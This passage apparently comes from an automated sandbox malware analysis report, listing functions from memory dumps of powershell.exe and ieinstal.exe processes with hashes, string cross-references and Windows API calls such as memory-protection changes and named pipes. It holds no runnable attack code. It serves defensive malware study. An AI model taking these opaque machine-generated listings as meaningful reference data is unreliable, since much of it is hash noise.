Instruction ID: e4ea2c9e5730031ae8156e12bd48a89bf3ca5944363294e69924b053c27de1d8
Opcode Fuzzy Hash: 5dbf671f199882ab5ab12a5a2462724c01444d54ad66b7b0959b8cfde87fb54c
Instruction Fuzzy Hash: 8E915A34A102148FDB24DFB4D954AAEBBF6AF88311F158469E909EB395DF30DC81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 08421820, Relevance: 1.6, Strings: 1, Instructions: 397COMMON

Download Yara Rule

Strings

`J, xrefs: 0842188D

Memory Dump Source

Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8420000_powershell.jbxd

Similarity

API ID:
String ID: `J
API String ID: 0-3750417106
Opcode ID: 11b2e9d05ee878e158117832dac81c8387def8182cde7d373101916dfb57b262
Instruction ID: f441173eb2f52bb7d8d8dc8579923c799335bc8fb8ba7fccd7ca6962dacdb91a
Opcode Fuzzy Hash: 11b2e9d05ee878e158117832dac81c8387def8182cde7d373101916dfb57b262
Instruction Fuzzy Hash: A3024C34A043498FCB11CF64C480B9DFFB2AF85304F15C59AE949AB352DB71AD89CB90

Uniqueness

Uniqueness Score: -1.00%

Function 08262CF8, Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8260000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7fff7626cf5025381cd22f159e71a970d3ef894e6d1aeab2fb4229a2f1cc6f4
Instruction ID: 530a6f974fec00554cd858237746917e0870aad2bd6f63a7b27ee7dd9e4050bd
Opcode Fuzzy Hash: c7fff7626cf5025381cd22f159e71a970d3ef894e6d1aeab2fb4229a2f1cc6f4
Instruction Fuzzy Hash: 5B819030B14245CBDB19CFA5C550BAEBBB2EF84315F10806DE906AB399DB74D986CB50

Uniqueness

Uniqueness Score: -1.00%

Function 08429108, Relevance: 6.4, Strings: 5, Instructions: 193COMMON

Download Yara Rule

Strings

`J, xrefs: 0842911C
`J, xrefs: 08429260
`J, xrefs: 0842927E
`J, xrefs: 0842929C
`J, xrefs: 08429242

Memory Dump Source

Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8420000_powershell.jbxd

Similarity

API ID:
String ID: `J$`J$`J$`J$`J
API String ID: 0-3850007678
Opcode ID: e95b52487a36fe1bd58764c9eac087dedf829b20381838ab2071036608ae9d92
Instruction ID: d93f5f1c9eb796987d0b40fddc510bb5e235e4fcdd81ee4f6a697783c1dde9a2
Opcode Fuzzy Hash: e95b52487a36fe1bd58764c9eac087dedf829b20381838ab2071036608ae9d92
Instruction Fuzzy Hash: 4E51EF307083458BDB149BB4D455AAF7FEAAFC5309F448D69D846CB391DF78E80A87A0

Uniqueness

Uniqueness Score: -1.00%

Function 0842A9E0, Relevance: 5.2, Strings: 4, Instructions: 242COMMON

Download Yara Rule

Strings

`J, xrefs: 0842ACB0
`J, xrefs: 0842AD02
`J, xrefs: 0842AD23
`J, xrefs: 0842ACE9

Memory Dump Source

Source File: 00000003.00000002.15284565570.0000000008420000.00000040.00000001.sdmp, Offset: 08420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8420000_powershell.jbxd

Similarity

API ID:
String ID: `J$`J$`J$`J
API String ID: 0-2501499896
Opcode ID: b9ceb37070e4bd2ab0549f6fa83371d62ac1bc0b3e59af86a08cfd2103176ed5
Instruction ID: ac23318b3d75b9880a93492dedc4c3d94acf12e26f60a3d2ada0c838308bef28
Opcode Fuzzy Hash: b9ceb37070e4bd2ab0549f6fa83371d62ac1bc0b3e59af86a08cfd2103176ed5
Instruction Fuzzy Hash: 9981D230B042148BCB18DBB9C5546AEBBF7AFC4305F548929D906AB384EF74ED468B91

Uniqueness

Uniqueness Score: -1.00%

Function 082613B0, Relevance: 5.2, Strings: 4, Instructions: 177COMMON

Download Yara Rule

Strings

$pm, xrefs: 0826153E
`J, xrefs: 08261497
`J, xrefs: 082614DD
$pm, xrefs: 0826154A

Memory Dump Source

Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8260000_powershell.jbxd

Similarity

API ID:
String ID: `J$`J$$pm$$pm
API String ID: 0-876320016
Opcode ID: 56bda28ae5fd1f521a231795fa489cef18cf9157b4f4425e405a578d6280888b
Instruction ID: c2f2920ff5b4fdfcc39af6a5522d55f5c8f5bb1fed94adb6ee963fa5af244049
Opcode Fuzzy Hash: 56bda28ae5fd1f521a231795fa489cef18cf9157b4f4425e405a578d6280888b
Instruction Fuzzy Hash: AF5147B1B20251DFC7188B78C8056AEB7A6EFC9721F14886DE506DB391DB34AC91C792

Uniqueness

Uniqueness Score: -1.00%

Function 08260E48, Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

`J, xrefs: 08261087
`J, xrefs: 08260F90
`J, xrefs: 08260EB5
`J, xrefs: 08260E97

Memory Dump Source

Source File: 00000003.00000002.15282457375.0000000008260000.00000040.00000010.sdmp, Offset: 08260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8260000_powershell.jbxd

Similarity

API ID:
String ID: `J$`J$`J$`J
API String ID: 0-2501499896
Opcode ID: 73239f7617decc677610b3879cf79f1059eaf95f0ea3ed7b943b761455219381
Instruction ID: 31335435dcc59e78c3f0c5c36c54546b5f9a9257417fc5d7f9e3a0771f77d1a9
Opcode Fuzzy Hash: 73239f7617decc677610b3879cf79f1059eaf95f0ea3ed7b943b761455219381
Instruction Fuzzy Hash: 7451F871F142444FCB05ABB8D8142EE7FEAEF89315B04486DD909EB392DF385D458BA2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ieinstal.exe PID: 6228 Parent PID: 6584 ieinstal.exeCOMMON

Execution Graph

Execution Coverage:	46.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	34.8%
Total number of Nodes:	23
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00B8BAE2, Relevance: 3.0, APIs: 2, Instructions: 40
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000005), ref: 00B8BB19
NtProtectVirtualMemory.NTDLL(000000FF,-0000001C,-00000018), ref: 00B8BB54

Memory Dump Source

Source File: 00000007.00000002.16975072707.0000000000B8B000.00000040.00000001.sdmp, Offset: 00B8B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b8b000_ieinstal.jbxd

Similarity

API ID: MemoryProtectSleepVirtual
String ID:
API String ID: 3235210055-0
Opcode ID: c25d4789d0ceeebebdf6a947ebfe35063d3abcefbacb07b0f54c02f73bd1c5e7
Instruction ID: 9b31b3faacb870b64f8ca1d6337816cde6388cece3762bb6ec3c1f80a5d1be33
Opcode Fuzzy Hash: c25d4789d0ceeebebdf6a947ebfe35063d3abcefbacb07b0f54c02f73bd1c5e7
Instruction Fuzzy Hash: 9D0148B1A00B009FE748AE31898CF19B7A4AF10324F69C1C9E4215F0B2DB788880DF61

Uniqueness

Uniqueness Score: -1.00%

Function 00B8BB70, Relevance: 1.6, APIs: 1, Instructions: 61
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00B8BBE7

Memory Dump Source

Source File: 00000007.00000002.16975072707.0000000000B8B000.00000040.00000001.sdmp, Offset: 00B8B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b8b000_ieinstal.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: f7f762bfe15c72029af196966360ebf30a7d53c180c6dc8aecfd0cbebc04bfb6
Instruction ID: 3b67db4555a14941580fbcacc9593470421f413b6b0b58f4164379ab53771538
Opcode Fuzzy Hash: f7f762bfe15c72029af196966360ebf30a7d53c180c6dc8aecfd0cbebc04bfb6
Instruction Fuzzy Hash: 871127F25003009FDB109A78CE91F493695EF26334BA583D5D926CB2F2D775C881CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00B8BB69, Relevance: 1.5, APIs: 1, Instructions: 49
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,00000040,00000000,?), ref: 00B8BBE7

Memory Dump Source

Source File: 00000007.00000002.16975072707.0000000000B8B000.00000040.00000001.sdmp, Offset: 00B8B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b8b000_ieinstal.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4c9e167a47ac41b80354cabd86715b766d2781c211a0aaf7230ef369ee00ee5b
Instruction ID: f600926654774e1526b9fbf134e08fb3c2aad9b632de0481c3dc76ea15c3db4c
Opcode Fuzzy Hash: 4c9e167a47ac41b80354cabd86715b766d2781c211a0aaf7230ef369ee00ee5b
Instruction Fuzzy Hash: DA01C0B25003009FDB14AB68CD86F493695FB16324B5243D9A9268B1B2D736D881CF20

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B819, Relevance: 1.7, APIs: 1, Instructions: 214
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32 ref: 00B8B984

Memory Dump Source

Source File: 00000007.00000002.16975072707.0000000000B8B000.00000040.00000001.sdmp, Offset: 00B8B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b8b000_ieinstal.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 57e9f06e463720912d65eca2f6378d19613db71ff35884ac5f4ef1dc5ac69dd2
Instruction ID: 96d6bd62504ad391fd1233ab884325a0edb1a91689a3a3abe67a1a238329c151
Opcode Fuzzy Hash: 57e9f06e463720912d65eca2f6378d19613db71ff35884ac5f4ef1dc5ac69dd2
Instruction Fuzzy Hash: 8751F5141A8A0B0DFB5C30478989FE82693D3B32D5FDCE7419C414D26B8E36D3A962C3

Uniqueness

Uniqueness Score: -1.00%

Function 00B8B7D0, Relevance: 1.6, APIs: 1, Instructions: 93
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32 ref: 00B8B984

Memory Dump Source

Source File: 00000007.00000002.16975072707.0000000000B8B000.00000040.00000001.sdmp, Offset: 00B8B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b8b000_ieinstal.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 9ef38afc7e4f56b3cf5879bd9b62b3cca6ff823f1804047de4b7fa707f713b5b
Instruction ID: ca77afa5d633dff981eb0c827ce9beeb224e916b5e6f3de9f1bd210db507407d
Opcode Fuzzy Hash: 9ef38afc7e4f56b3cf5879bd9b62b3cca6ff823f1804047de4b7fa707f713b5b
Instruction Fuzzy Hash: 7731E331500342CFDB68DF78C998BA677E2EF55360F1992E9C849DB672D7358880C702

Uniqueness

Uniqueness Score: -1.00%

Function 00B8BADD, Relevance: 1.3, APIs: 1, Instructions: 20
sleepnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000005), ref: 00B8BB19
NtProtectVirtualMemory.NTDLL(000000FF,-0000001C,-00000018), ref: 00B8BB54

Memory Dump Source

Source File: 00000007.00000002.16975072707.0000000000B8B000.00000040.00000001.sdmp, Offset: 00B8B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b8b000_ieinstal.jbxd

Similarity

API ID: MemoryProtectSleepVirtual
String ID:
API String ID: 3235210055-0
Opcode ID: 7945a5768f9595802b75acdbb51162f1435fd580e520fbba767e268d23b03a84
Instruction ID: b2aadfe6c94f06deb135c1f3fb8889a64b9e1b0a95331365846c2947fce3946a
Opcode Fuzzy Hash: 7945a5768f9595802b75acdbb51162f1435fd580e520fbba767e268d23b03a84
Instruction Fuzzy Hash: 9FE01260600B408BD748BF3085C9F287BA2AB84711F6AC0D9E1091A1B29B348880EB60

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: powershell.exe PID: 2072 Parent PID: 4620 powershell.exeCOMMON

Execution Graph

Execution Coverage:	8.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.7%
Total number of Nodes:	436
Total number of Limit Nodes:	44

Executed Functions

Function 089FEBD0, Relevance: 15.6, Strings: 12, Instructions: 590
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ld@l, xrefs: 089FF03B
Ld@l, xrefs: 089FF02F
p`pm, xrefs: 089FED4C
4'pm, xrefs: 089FF001
$pm, xrefs: 089FEF1E
,tm, xrefs: 089FEC2A
$pm, xrefs: 089FEFE3
$pm, xrefs: 089FEFD9
$pm, xrefs: 089FEF14
,tm, xrefs: 089FEF4D
4'pm, xrefs: 089FF057
p`pm, xrefs: 089FED42

Memory Dump Source

Source File: 00000009.00000002.16437840694.00000000089F0000.00000040.00000010.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89f0000_powershell.jbxd

Similarity

API ID:
String ID: ,tm$,tm$4'pm$4'pm$Ld@l$Ld@l$p`pm$p`pm$$pm$$pm$$pm$$pm
API String ID: 0-4140540224
Opcode ID: 59ccba5123d055b6cf46e7944206c7c8e86f7040663948a94b5d779929173471
Instruction ID: 3481160ddf4bd7eb16bd61b3379ea234906e2fe4b0f1d41aff29639e33721264
Opcode Fuzzy Hash: 59ccba5123d055b6cf46e7944206c7c8e86f7040663948a94b5d779929173471
Instruction Fuzzy Hash: 5322B730B002458FCB18DF74C854AAE7BB6AF89319B148479D606DB3A5DF34EC45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 089FA3A8, Relevance: 3.2, Strings: 2, Instructions: 686COMMON

Download Yara Rule

Strings

"Gl, xrefs: 089FADA2
"Gl, xrefs: 089FA9D7

Memory Dump Source

Source File: 00000009.00000002.16437840694.00000000089F0000.00000040.00000010.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89f0000_powershell.jbxd

Similarity

API ID:
String ID: "Gl$"Gl
API String ID: 0-3290586065
Opcode ID: e7e5e6fe287618bd289d797ca9ed66b40bf878ccdaaf8aea5fbead6cf00595f0
Instruction ID: 898b7bc821b0be1bfee4150f61f265a4ae6067459dad240bd69205ae6617c2bf
Opcode Fuzzy Hash: e7e5e6fe287618bd289d797ca9ed66b40bf878ccdaaf8aea5fbead6cf00595f0
Instruction Fuzzy Hash: A7524A34B002548FCB54DF68C954BAEBBF6AF88305F1085A9E50AEB355DB34AD81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 081517B2, Relevance: 1.9, Strings: 1, Instructions: 664COMMON

Download Yara Rule

Strings

`Qpm, xrefs: 08151DC0

Memory Dump Source

Source File: 00000009.00000002.16429850508.0000000008150000.00000040.00000010.sdmp, Offset: 08150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8150000_powershell.jbxd

Similarity

API ID:
String ID: `Qpm
API String ID: 0-1797261451
Opcode ID: 823e7333a3e13d3777f54387abc09ee935dca7c8b12461ea57bc39cff8c058e7
Instruction ID: d1efc2399d355212978a15502a0998fd691c9744e71eba462c3645b45bd72c18
Opcode Fuzzy Hash: 823e7333a3e13d3777f54387abc09ee935dca7c8b12461ea57bc39cff8c058e7
Instruction Fuzzy Hash: 39429C30A00209DFDB16DF64C894BAEBBB2FF84305F4185A9ED15AB395EB35D981CB50

Uniqueness

Uniqueness Score: -1.00%

Function 081C2E5A, Relevance: 1.8, APIs: 1, Instructions: 320pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeW.KERNELBASE(?,?,?,?,?,?,00000001,00000000), ref: 081C3218

Memory Dump Source

Source File: 00000009.00000002.16430637457.00000000081C0000.00000040.00000001.sdmp, Offset: 081C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_81c0000_powershell.jbxd

Similarity

API ID: CreateNamedPipe
String ID:
API String ID: 2489174969-0
Opcode ID: eae1d42e01d7250929a8e887c15348d9c00414230fefe8440ae99b08a0a5003a
Instruction ID: f7c7d4a7d00fbda8f1c7e7fbc71edfc58f51ff81a7d22818cdd7058b69b2f904
Opcode Fuzzy Hash: eae1d42e01d7250929a8e887c15348d9c00414230fefe8440ae99b08a0a5003a
Instruction Fuzzy Hash: 9BC1BE70E002089FDB14DFA9C854BEEBBF6EF88704F14842DE905AB391DB749945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 08152E11, Relevance: 1.8, Strings: 1, Instructions: 517COMMON

Download Yara Rule

Strings

(tm, xrefs: 081531D1

Memory Dump Source

Source File: 00000009.00000002.16429850508.0000000008150000.00000040.00000010.sdmp, Offset: 08150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8150000_powershell.jbxd

Similarity

API ID:
String ID: (tm
API String ID: 0-8316014
Opcode ID: cfebcf8bd397f90d911c4dc578b683392f6cfd9519c2502eb5c809583884bdb7
Instruction ID: e26e76e1ced1508f018703fced95e5864c9de9272d701e1a58329feaa39307de
Opcode Fuzzy Hash: cfebcf8bd397f90d911c4dc578b683392f6cfd9519c2502eb5c809583884bdb7
Instruction Fuzzy Hash: 9E229F71A00609DFDB14DF68C844A9EB7F6FF85305F1489A9E816AB360DB70ED46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0898EF40, Relevance: 1.1, Instructions: 1145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.16436535667.0000000008980000.00000040.00000001.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 604125e7166da464b4a2a4964e91ed243015c67cc43189b6523f177a2edd0c40
Instruction ID: 75d2599c639f487c278a74e89d59e630dfd05ef560b4cf0b738f18fd614066b7
Opcode Fuzzy Hash: 604125e7166da464b4a2a4964e91ed243015c67cc43189b6523f177a2edd0c40
Instruction Fuzzy Hash: 1592AD30A04205CFCB15EFA8D454AAE7BB6EF8930AF14846DE8069B395DF35DC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 08153210, Relevance: .5, Instructions: 541COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.16429850508.0000000008150000.00000040.00000010.sdmp, Offset: 08150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8150000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1757d27bb61977e12e1e66741a2b452d977d02ca95094990b85eb100a610ed02
Instruction ID: a12040b832e7a1b21e55621d3a1f1719587a3a19f6bfaf8168cadabbf8d59e01
Opcode Fuzzy Hash: 1757d27bb61977e12e1e66741a2b452d977d02ca95094990b85eb100a610ed02
Instruction Fuzzy Hash: 2922AF30B10208DFCB15DF68C445AAEBBE6EF85345F148868E8169B365DF74ED06CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0898AA08, Relevance: .5, Instructions: 470COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.16436535667.0000000008980000.00000040.00000001.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aa770242c0d30d92d4d10dd624821af67e1181d2a676d75ea07a48b04010238
Instruction ID: 633ab2a9ec77f84e3e79d87d7f0e76c43b95bc4b858da519f35096ec0e2830fa
Opcode Fuzzy Hash: 1aa770242c0d30d92d4d10dd624821af67e1181d2a676d75ea07a48b04010238
Instruction Fuzzy Hash: 9002C070A04216CFDB24EF65C944BAEBBEAAF8430AF14896EE405DB291DB74DC41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 08988F48, Relevance: .4, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.16436535667.0000000008980000.00000040.00000001.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b62c5753ec7a08313942633fda3a1b3cc3ba2c2e29b823dba006febb744ff606
Instruction ID: 02a46bd9930fb7efd0975eb4f690ee0454226b2bc72250e7ad3ee6e0a3c07b71
Opcode Fuzzy Hash: b62c5753ec7a08313942633fda3a1b3cc3ba2c2e29b823dba006febb744ff606
Instruction Fuzzy Hash: B9E17F74B00205CFCB05EF68C854AAEBBF6BF88345F148469E9059B3A5CB78DD45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 089F95C0, Relevance: 12.9, Strings: 10, Instructions: 435
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

"Gl, xrefs: 089F97C0
Ld@l, xrefs: 089F982A
Ld@l, xrefs: 089F96E6
Ld@l, xrefs: 089F981E
4'pm, xrefs: 089F9A93
"Gl, xrefs: 089F9A82
Ld@l, xrefs: 089F96F2
[, xrefs: 089F98B7
Ld@l, xrefs: 089F9771
Ld@l, xrefs: 089F9765

Memory Dump Source

Source File: 00000009.00000002.16437840694.00000000089F0000.00000040.00000010.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89f0000_powershell.jbxd

Similarity

API ID:
String ID: "Gl$"Gl$4'pm$Ld@l$Ld@l$Ld@l$Ld@l$Ld@l$Ld@l$[
API String ID: 0-860386212
Opcode ID: 0ecd57f3e0f32f2627c13c1874ad5c509c3b8e197abd7fc501edfa8bb8111635
Instruction ID: b0ef4a2799422e79396d95712ed45f3b3485cb2fac9f190f1ae1acf3ef70d10a
Opcode Fuzzy Hash: 0ecd57f3e0f32f2627c13c1874ad5c509c3b8e197abd7fc501edfa8bb8111635
Instruction Fuzzy Hash: 97022234B002048FC754EBA8C995AAEBBF6AF88355F144538E906AB355DF74EC06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 089FE818, Relevance: 9.1, Strings: 7, Instructions: 311
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ld@l, xrefs: 089FEAE2
Ld@l, xrefs: 089FEB1D
Ld@l, xrefs: 089FEAD6
Ld@l, xrefs: 089FEB8A
!um, xrefs: 089FE989
Ld@l, xrefs: 089FEB96
Ld@l, xrefs: 089FEB11

Memory Dump Source

Source File: 00000009.00000002.16437840694.00000000089F0000.00000040.00000010.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89f0000_powershell.jbxd

Similarity

API ID:
String ID: Ld@l$Ld@l$Ld@l$Ld@l$Ld@l$Ld@l$!um
API String ID: 0-1571545934
Opcode ID: a9f7124dc1e2deffbeceffe9935931387058784830fc14716369c192c84149e3
Instruction ID: eb4037747bd4cae246e85048529286ca63ea96d3ffe12ad7a3d8fd7c05d52b3e
Opcode Fuzzy Hash: a9f7124dc1e2deffbeceffe9935931387058784830fc14716369c192c84149e3
Instruction Fuzzy Hash: 51B180307042058FCB18EF69C494AAE7BEABF89619B0544B9E506CF372DB71DC41CB62

Uniqueness

Uniqueness Score: -1.00%

Function 089F91A0, Relevance: 7.7, Strings: 6, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'pm, xrefs: 089F92BA
Ld@l, xrefs: 089F922C
"Gl, xrefs: 089F9452
4'pm, xrefs: 089F9461
"Gl, xrefs: 089F91BA
Ld@l, xrefs: 089F9238

Memory Dump Source

Source File: 00000009.00000002.16437840694.00000000089F0000.00000040.00000010.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89f0000_powershell.jbxd

Similarity

API ID:
String ID: "Gl$"Gl$4'pm$4'pm$Ld@l$Ld@l
API String ID: 0-1116740274
Opcode ID: a4281ec484a612bffca97a748cf5ee0240b37f0d67cf6b8b2a2628f8f748fced
Instruction ID: d47da750b01fb21aa08522e710ac79a99b003b7fd40d0fe5ef5feb4307ca4ff4
Opcode Fuzzy Hash: a4281ec484a612bffca97a748cf5ee0240b37f0d67cf6b8b2a2628f8f748fced
Instruction Fuzzy Hash: 4E912F34B002048FC748EFA4D894AAEBBFAEFC9315B148468D90ADB395DF359C41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0898A488, Relevance: 5.3, Strings: 4, Instructions: 342
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Htm, xrefs: 0898A76C
l8Gl, xrefs: 0898A6B6
4<Gl, xrefs: 0898A732
l8Gl, xrefs: 0898A696

Memory Dump Source

Source File: 00000009.00000002.16436535667.0000000008980000.00000040.00000001.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8980000_powershell.jbxd

Similarity

API ID:
String ID: 4<Gl$Htm$l8Gl$l8Gl
API String ID: 0-3767182861
Opcode ID: 2c4893659226c9e793ed2a4d78c0a58cf478095931c3226d7204363de6827e8e
Instruction ID: 1c93ddc23a36e010b98d525ebbec72b59d71db275ff2a1d43b4222a4e9a1f8b8
Opcode Fuzzy Hash: 2c4893659226c9e793ed2a4d78c0a58cf478095931c3226d7204363de6827e8e
Instruction Fuzzy Hash: 66D17E70B04215CFCB14EFB8D454AAEBBF6AF88215F14846AE901EB390DB35DC46CB61

Uniqueness

Uniqueness Score: -1.00%

Function 089D6820, Relevance: 4.0, Strings: 3, Instructions: 233
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

^Gl, xrefs: 089D6BBF
"Gl, xrefs: 089D6A30
^Gl, xrefs: 089D69FC

Memory Dump Source

Source File: 00000009.00000002.16437501151.00000000089D0000.00000040.00000010.sdmp, Offset: 089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89d0000_powershell.jbxd

Similarity

API ID:
String ID: "Gl$^Gl$^Gl
API String ID: 0-1084755145
Opcode ID: 346faf11fdebff5be7b435af08b3e5b1d1c588164f9605567d10b20a48a83d3c
Instruction ID: ce8fc4e6f2628e3a94c03849f922c61e4f98f93316e41960d3198fe8e0b80383
Opcode Fuzzy Hash: 346faf11fdebff5be7b435af08b3e5b1d1c588164f9605567d10b20a48a83d3c
Instruction Fuzzy Hash: BE919030B002459FDB05EF74C851AEEBBB6AFC9304F148528E906AB395DF35AD06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 089D6830, Relevance: 4.0, Strings: 3, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

^Gl, xrefs: 089D6BBF
"Gl, xrefs: 089D6A30
^Gl, xrefs: 089D69FC

Memory Dump Source

Source File: 00000009.00000002.16437501151.00000000089D0000.00000040.00000010.sdmp, Offset: 089D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89d0000_powershell.jbxd

Similarity

API ID:
String ID: "Gl$^Gl$^Gl
API String ID: 0-1084755145
Opcode ID: 6f036e447e5a51d9f9254738b0ac20bc3e1625a84f2014496a7b75220ef9085a
Instruction ID: c1b913f5f88ee1d9c9a0d99cf948eef095a215309678f7abf979add5f401d12e
Opcode Fuzzy Hash: 6f036e447e5a51d9f9254738b0ac20bc3e1625a84f2014496a7b75220ef9085a
Instruction Fuzzy Hash: F4817F34B002059FDB05EB74C851AEEBBB6AFC8304F148528E906AB795DF35AD068B91

Uniqueness

Uniqueness Score: -1.00%

Function 089FEBC0, Relevance: 3.9, Strings: 3, Instructions: 197COMMON

Download Yara Rule

Strings

,tm, xrefs: 089FEC2A
Ld@l, xrefs: 089FEB8A
p`pm, xrefs: 089FED42

Memory Dump Source

Source File: 00000009.00000002.16437840694.00000000089F0000.00000040.00000010.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89f0000_powershell.jbxd

Similarity

API ID:
String ID: ,tm$Ld@l$p`pm
API String ID: 0-1015841468
Opcode ID: b3245a7ae7fe319bf8a2559100cfe4636a92be1b3a5bb2110f6d63711a841d1a
Instruction ID: b22ace116fcb57939c68b914bed2ba5f29240da13573fb68319abe5921838601
Opcode Fuzzy Hash: b3245a7ae7fe319bf8a2559100cfe4636a92be1b3a5bb2110f6d63711a841d1a
Instruction Fuzzy Hash: 6671B531A10209CFCB48DF69C880AAEB7B9FF85319B048979D5069F775DB30AD45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 089F8F40, Relevance: 3.9, Strings: 3, Instructions: 196COMMON

Download Yara Rule

Strings

Ld@l, xrefs: 089F902C
Ld@l, xrefs: 089F9020
4'pm, xrefs: 089F9082

Memory Dump Source

Source File: 00000009.00000002.16437840694.00000000089F0000.00000040.00000010.sdmp, Offset: 089F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_89f0000_powershell.jbxd

Similarity

API ID:
String ID: 4'pm$Ld@l$Ld@l
API String ID: 0-493522277
